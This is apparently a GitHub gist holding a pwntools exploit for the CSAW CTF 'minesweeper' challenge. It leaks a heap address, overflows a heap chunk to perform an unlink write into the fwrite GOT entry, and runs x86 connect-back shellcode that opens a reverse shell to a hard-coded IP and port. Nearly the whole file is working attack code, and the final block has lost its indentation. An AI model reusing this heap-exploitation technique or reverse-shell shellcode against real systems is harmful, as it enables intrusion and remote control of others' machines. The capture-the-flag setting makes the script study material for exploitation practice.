@m1ghtym0
Last active September 17, 2017 20:04
from pwn import *
import sys
"""
Unpack the binary with upx -d
"""
BINARY = "./minesweeper"
# Set context for asm
context.clear()
context(os='linux', arch='i386', bits=32)
#context.log_level = 'debug'
# connect-back shell | IP | | Port |
shell_code = "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x83\xbc\x1e\x41\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
def read_menu(r):
    """Consume tube output up to and including the menu line that ends with '(Quit)'.

    Args:
        r: pwntools tube connected to the game.
    """
    r.recvuntil('(Quit)\n')
def init(r, val, content):
    """Drive the 'I' menu entry: answer the first prompt with `val` and the second with `content`.

    The statement order is the protocol; each send waits for the matching prompt first.

    Args:
        r: pwntools tube connected to the game.
        val: text sent after the first prompt line has been read.
        content: text sent after the line ending 'by the character X'.
    """
    r.sendline('I')
    r.recvline()  # first prompt; its contents are not inspected
    r.sendline(val)
    r.recvuntil('by the character X\n')
    r.sendline(content)
def mal_unlink(what, where):
    """Pack `what` followed by `where - 4` as two consecutive 32-bit words.

    Uses pwntools p32(), so the byte order follows the module-level context.

    Args:
        what: first 32-bit value.
        where: address from which 4 is subtracted before packing.

    Returns:
        str: the 8 packed bytes.
    """
    words = (what, where - 4)
    return ''.join(p32(word) for word in words)
def shellcode():
    """Return the payload: a fixed 2-byte prefix, eleven 0x90 (NOP) bytes, then `shell_code`.

    Reads the module-level `shell_code` constant; takes no parameters.

    Returns:
        str: the assembled byte string.
    """
    prefix = '\xeb\x0b'
    filler = '\x90' * 11
    return prefix + filler + shell_code
def leak(r):
    """Walk the 'N' -> 'V' -> 'Q' menu path and return the value printed on the two 'bwd' lines.

    The receive calls skip a fixed number of lines, so this only works when the game's
    output layout matches exactly what is hard-coded here.

    Args:
        r: pwntools tube connected to the game.

    Returns:
        int: u32 of the two 'bwd' lines concatenated (named bwd_ptr by the original author).
    """
    r.sendline('N')
    r.recvuntil('game (Q)\n')
    r.sendline('V')
    r.recvlines(5)
    r.recvline() # padding
    r.recvlines(2) # size
    bwd = r.recvlines(2) # bwd
    r.sendline('Q')
    read_menu(r)
    # recvlines() drops the line endings, so the two pieces are joined raw;
    # u32 expects exactly 4 bytes here, so any other total length is an error.
    bwd_ptr = u32(bwd[0]+bwd[1])
    return bwd_ptr
def exploit(r, elf, libc, local):
    """Run the two-stage sequence over tube `r`: leak a value, then send the crafted board.

    Args:
        r: pwntools tube connected to the game.
        elf: pwnlib ELF of BINARY; only elf.got['fwrite'] is read.
        libc: unused in this function (every caller passes None).
        local: unused in this function.
    """
    # leak heap-addr
    init(r, 'B 2 5', 'X'*10)
    bwd_ptr = leak(r)
    heap_base = bwd_ptr & ~0xfff  # clear the low 12 bits (page-align the leaked value)
    target_addr = heap_base | 0x0fc  # fixed offset within that page; assumes a stable layout — TODO confirm
    log.info('bwd-ptr {}'.format(hex(bwd_ptr)))
    log.info('target_addr {}'.format(hex(target_addr)))
    pause()
    # overflow chunk
    payload = ''
    payload += shellcode()
    payload = payload.ljust(0xcc, 'X') # 0x414-0x024
    # NOTE(review): the comment above does not match the code — 0x414 - 0x024 is 0x3f0,
    # while the padding actually applied is 0xcc. The code value is what runs.
    payload += p32(0x12)
    payload += mal_unlink(what=target_addr, where=elf.got['fwrite'])
    payload = payload.ljust(0x130, 'A')
    init(r, 'B 3 101', payload)
    # trigger shellcode
    log.info('Connects back to IP:PORT specified in shell-code')
    log.success('BUMMMOOO!')
    pause()
if __name__ == "__main__":
elf = ELF(BINARY)
if len(sys.argv) < 2:
print "Usage: {} local|docker|remote".format(sys.argv[0])
sys.exit(1)
elif sys.argv[1] == 'remote':
H,P = ("pwn.chal.csaw.io", 7478)
r = remote(H,P)
libc = None
exploit(r, elf, libc, local=False)
else:
if sys.argv[1] == 'local':
p = process(BINARY)
print "PID: {}".format(util.proc.pidof(p))
pause()
r = remote('localhost', 31337)
libc = None
else:
r = process(BINARY, env = {"LD_PRELOAD" : LIBC})
libc = None
exploit(r, elf, libc, local=True)